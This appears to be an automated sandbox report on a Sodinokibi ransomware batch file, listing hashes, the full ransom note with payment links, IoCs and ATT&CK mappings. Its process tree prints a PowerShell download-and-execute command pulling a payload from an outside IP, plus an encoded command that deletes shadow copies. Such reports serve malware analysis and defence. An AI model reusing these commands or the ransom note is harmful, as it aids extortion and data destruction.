sodinokibi | 4167595a02a41357a7cb611b831f74f802ce747c124913fefe76789babbf1c40

General

Target

df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
Size

222B
MD5

19b3b3791a8bb6e48fca9c29132a649e
SHA1

b03af91b377f63ab4d6c236a7f942643aa66498f
SHA256

4167595a02a41357a7cb611b831f74f802ce747c124913fefe76789babbf1c40
SHA512

f2e3d44f22f21c2a5d24013772ec273c510fc76ab32e6586125c22d968886198d2225138570153385fb94b06f0360e13a59fd7fe33fef2aa3c447e25554eac42

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/df9ae1ee4f2b0aa1f7a2e70779f9dbd4

Extracted

Path

C:\z795dq-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension z795dq. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FB5F5D0526F17E3 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3FB5F5D0526F17E3 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: WIHeQxC39lCrYt3S+00z6uk6ZYR7Hnd4lDx5AQpdOr9wFMDT8EZWIlKmCojwtoll ot2QhQ8uhFVfvvLINcOjuEv44DBHKcByTfoKx2/AorloJtjvilk43dj4HjeLZIwO VBYcog9ad08De4gNX8rwUIH6j+Lh+3PLmmkSOQiiTm8OyGHsERF7Fg02MPR9LuX2 RkCeYrLd+8Cx6vh+EFxQn/KFHpR9XBbXVjzuH1ifBIphOFydO2mwBVRS+ezwrLB1 sxt+5omlqdYcEuciV2NhROQbzlrH9Oblp5gf5VFn/tn9RKpiIwIJ86LWyAYGn4nj 8pa5tfJsNwb7BN1GRUJ4kH/4zm0IC2OIjAfhH3DsXYSZWk0lvOqnZ8xLkfYk9wYH CTUxVeQ1/efaxy7WbD+GADh8ggRUJR4cc3d6sLVDnXVYrZQoqOub+NBN9M11lHvb +jZcVpNYgAkogx3FYTCQHTjt1LGIEiJ5ISKwLqqslEIox1U7/8TtmJ7sqXqd9gJC SwQ7oUYgZUGrHIeShjvC9cHsbA8KXFoYcPvoVV+n9nVXUdORsX0/4YhGnObmGvI2 civNmLm5K/iLLJ1h/x0myIY/CPSuAohQLtX/6ihOpyRW6On5iNC7JFgwHQtyCwNa Kz4jy9zOW8wlj0Kw9inM9nuC0KMg3g1mmMQ2tCJ97Au1IydQpXhwTcI+68huzRn7 9W8MVx7gdGeNV8AlIdy639v4jPLk6uHyL4Ul3JyoQNZO9k5kLa1GvojkVuCV4tbu 1FgpfuG/szwWXUaU8aRvxPKrlNXCPwDuYZQ8J0nwdvdQjvicqVoOTc/fd6v25Ggl 4HGXokeMWq2WkeO//f/f7UpSPzB0NK7xymE4CzezOi8CAQnMw5ABL5A/6IyangJd fXS8I/5FXc06pLyNN2FjFD5n/MIW++DfQbOWO4uTDjXww02NolHwAW1TxfAut/7/ BSLl5mgpjA1HRXrDdr+4xrQVUxAR/42W77KI+t0s0ReZc7khVLqCy5BdKpFffSk3 EPyeNaduTiieNBEjTkMpa+ETzpMbVGmBz/NvFdchmbZ/Powx/D35BiLjwFehr1Co QmCT5044QVSUE3X/Jj5isCMoHO7sEnlUzoC+rVyee0YNirNoXH58UMa3fNq0QOXM TKEwaVDppg3RZr5tj2LIzjgVT9ne8+czGFKt5oJ+izmzSfzy62wuqGDK9E2iMX3P KOevByN5ykYsdmL9acXj/Yc6NNOxrkxAmY1jXTjGIIhPwj/BF3LmM/rBf2BjFZkg 60fqc7rjui4COekWuZmCIg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FB5F5D0526F17E3

http://decryptor.cc/3FB5F5D0526F17E3

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 3228 powershell.exe

flow	pid	process
3	3228	powershell.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\RestoreConnect.raw => \??\c:\users\admin\pictures\RestoreConnect.raw.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\StartEdit.raw => \??\c:\users\admin\pictures\StartEdit.raw.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\WriteClear.crw => \??\c:\users\admin\pictures\WriteClear.crw.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\StopUndo.tif => \??\c:\users\admin\pictures\StopUndo.tif.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\EnterConnect.crw => \??\c:\users\admin\pictures\EnterConnect.crw.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\PushSet.png => \??\c:\users\admin\pictures\PushSet.png.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\ReadUnlock.crw => \??\c:\users\admin\pictures\ReadUnlock.crw.z795dq	powershell.exe
File renamed	C:\Users\Admin\Pictures\RemoveExpand.tif => \??\c:\users\admin\pictures\RemoveExpand.tif.z795dq	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\jhoe5uxgtk.bmp"	powershell.exe

Drops file in Program Files directory 13 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\CompressRestart.mpp	powershell.exe
File opened for modification	\??\c:\program files\SwitchRepair.vb	powershell.exe
File opened for modification	\??\c:\program files\UnregisterWatch.txt	powershell.exe
File created	\??\c:\program files\z795dq-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\BackupUnregister.ADTS	powershell.exe
File opened for modification	\??\c:\program files\ResolveUpdate.xlsb	powershell.exe
File opened for modification	\??\c:\program files\StepPop.wvx	powershell.exe
File opened for modification	\??\c:\program files\StopUninstall.tiff	powershell.exe
File opened for modification	\??\c:\program files\SuspendDismount.xml	powershell.exe
File opened for modification	\??\c:\program files\SwitchUnblock.dot	powershell.exe
File opened for modification	\??\c:\program files\UseShow.wps	powershell.exe
File created	\??\c:\program files (x86)\z795dq-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\NewEnable.xlsx	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3228	powershell.exe
3228	powershell.exe
3228	powershell.exe
3228	powershell.exe
3228	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeBackupPrivilege	3904	vssvc.exe
Token: SeRestorePrivilege	3904	vssvc.exe
Token: SeAuditPrivilege	3904	vssvc.exe
Token: SeTakeOwnershipPrivilege	3228	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 3832 wrote to memory of 3228	3832	cmd.exe	powershell.exe
PID 3832 wrote to memory of 3228	3832	cmd.exe	powershell.exe
PID 3832 wrote to memory of 3228	3832	cmd.exe	powershell.exe
PID 3228 wrote to memory of 2696	3228	powershell.exe	powershell.exe
PID 3228 wrote to memory of 2696	3228	powershell.exe	powershell.exe
PID 3228 wrote to memory of 2696	3228	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df9ae1ee4f2b0aa1f7a2e70779f9dbd4');Invoke-DWFHDKTAJZTPUIQ;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3904

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2696-13-0x0000000000000000-mapping.dmp

Download
memory/2696-27-0x0000000009570000-0x0000000009571000-memory.dmp

Filesize
4KB

Download
memory/2696-26-0x0000000008EE0000-0x0000000008EE1000-memory.dmp

Filesize
4KB

Download
memory/2696-24-0x0000000008F80000-0x0000000008F81000-memory.dmp

Filesize
4KB

Download
memory/2696-14-0x0000000073B60000-0x000000007424E000-memory.dmp

Filesize
6.9MB

Download
memory/3228-8-0x0000000007650000-0x0000000007651000-memory.dmp

Filesize
4KB

Download
memory/3228-6-0x0000000006F60000-0x0000000006F61000-memory.dmp

Filesize
4KB

Download
memory/3228-7-0x0000000007810000-0x0000000007811000-memory.dmp

Filesize
4KB

Download
memory/3228-0-0x0000000000000000-mapping.dmp

Download
memory/3228-9-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

Filesize
4KB

Download
memory/3228-10-0x0000000007F00000-0x0000000007F01000-memory.dmp

Filesize
4KB

Download
memory/3228-11-0x0000000009630000-0x0000000009631000-memory.dmp

Filesize
4KB

Download
memory/3228-12-0x0000000008BB0000-0x0000000008BB1000-memory.dmp

Filesize
4KB

Download
memory/3228-5-0x0000000006E80000-0x0000000006E81000-memory.dmp

Filesize
4KB

Download
memory/3228-4-0x0000000006D20000-0x0000000006D21000-memory.dmp

Filesize
4KB

Download
memory/3228-3-0x0000000007000000-0x0000000007001000-memory.dmp

Filesize
4KB

Download
memory/3228-2-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/3228-1-0x0000000073B60000-0x000000007424E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads